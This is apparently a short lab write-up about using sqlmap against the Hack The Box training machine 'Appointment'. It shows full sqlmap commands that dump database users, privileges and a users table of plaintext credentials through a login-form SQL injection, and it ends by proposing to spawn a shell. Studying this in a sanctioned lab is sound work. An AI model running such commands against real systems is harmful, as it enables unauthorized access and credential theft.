Getting more data with sqlmap

Starting point HTB machine "Appointment" is a simple web app that has a vulnerable SQL Injection login bypass.

We can know it by trying some SQL Injection payload to bypass the login page and get the flag.

--

So, I want to know how great is sqlmap to find "more" data from the vulnerable login page.

As a background, I don't know:

• what version of the database
• what is the hostname
• what is database username being used
• etc

The first step, I ran this command:

$ python3 sqlmap.py -u 'http://10.129.11.144/' --data="username=admin&password=admin" -a        

it stopped with no significant info. But I got the database type that is being used by the web app.

So I re-ran again with adding one more parameter "--dbms=mysql"

$ python3 sqlmap.py -u 'http://10.129.11.144/' --data="username=admin&password=admin" -a --dbms=mysql        

I got more interesting data:

• Banners

• Current user

• Current database and hostname

• list DBMS users

• DBMS user privileges and roles

• Retrieve Tables

Database: appdb
Table: users
[2 entries]
+----+---------------------------------------------------+----------+
| id | password                                          | username |
+----+---------------------------------------------------+----------+
| 1  | 328ufsdhjfu2hfnjsekh3rihjfcn23KDFmfesd239"23m^jdf | admin    |
| 2  | bababa                                            | test     |
+----+---------------------------------------------------+----------+

        

--

Next step, perhaps try to spawn a shell :)